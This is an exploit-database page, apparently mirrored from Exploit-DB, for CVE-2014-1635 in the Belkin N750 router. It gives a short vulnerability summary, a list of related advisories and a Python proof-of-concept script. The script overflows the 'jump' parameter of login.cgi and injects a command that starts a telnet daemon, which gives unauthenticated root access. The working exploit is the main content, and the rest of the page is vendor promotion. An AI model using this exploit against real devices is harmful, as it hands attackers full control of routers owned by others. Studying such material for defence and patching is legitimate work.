Lucene search
K

Belkin N750 - 'jump?login' Remote Buffer Overflow

🗓️ 06 Nov 2014 00:00:00Reported by Marco VazType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 41 Views

Vulnerability in Belkin N750 guest network interfac

Related
Code
ReporterTitlePublishedViews
Family
0day.today
Belkin n750 jump login Parameter Buffer Overflow Exploit
7 Nov 201400:00
zdt
Circl
CVE-2014-1635
6 Nov 201400:00
circl
Check Point Advisories
Belkin N750 Router Unauthenticated Remote Command Execution (CVE-2014-1635)
12 Nov 201400:00
checkpoint_advisories
CVE
CVE-2014-1635
12 Nov 201416:00
cve
Cvelist
CVE-2014-1635
12 Nov 201416:00
cvelist
exploitpack
Belkin N750 - jump?login Remote Buffer Overflow
6 Nov 201400:00
exploitpack
exploitpack
Belkin-n750-jump-login-Parameter
4 Jan 201516:26
exploitpack
Metasploit
Belkin Play N750 login.cgi Buffer Overflow
10 Mar 201515:49
metasploit
NVD
CVE-2014-1635
12 Nov 201416:55
nvd
Packet Storm
Belkin Play N750 login.cgi Buffer Overflow
24 Mar 201500:00
packetstorm
Rows per page
"""
Source: https://labs.integrity.pt/articles/from-0-day-to-exploit-buffer-overflow-in-belkin-n750-cve-2014-1635/

A vulnerability in the guest network web interface of the Belkin N750 DB Wi-Fi Dual-Band N+ Gigabit Router with firmware F9K1103_WW_1.10.16m, allows an unauthenticated remote attacker to gain root access to the operating system of the affected device. The guest network functionality is default functionality and is delivered over an unprotected wifi network.

Successful exploitation of the vulnerability enables the attacker to gain full control of the affected router.

"""
#!/usr/bin/python
#Title : Belkin n750 buffer overflow in jump login parameter
#Date : 28 Jan 2014
#Author : Discovered and developed by Marco Vaz <[email protected]>
#Testd on: Firmware: 1.10.16m (2012/9/14 6:6:56) / Hardware : F9K1103 v1 (01C)

import httplib

headers = {}
body= “GO=&jump=”+ “a”*1379 +”%3b”+ “/usr/sbin/utelnetd -d” +”%3b&pws=\n\n”
conn = httplib.HTTPConnection(“192.168.169.1″,8080)
conn.request(“POST”, “/login.cgi”, body, headers)
response = conn.getresponse()
data = response.read()
print data

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

06 Nov 2014 00:00Current
6.5Medium risk
Vulners AI Score6.5
CVSS 210
EPSS0.82871
41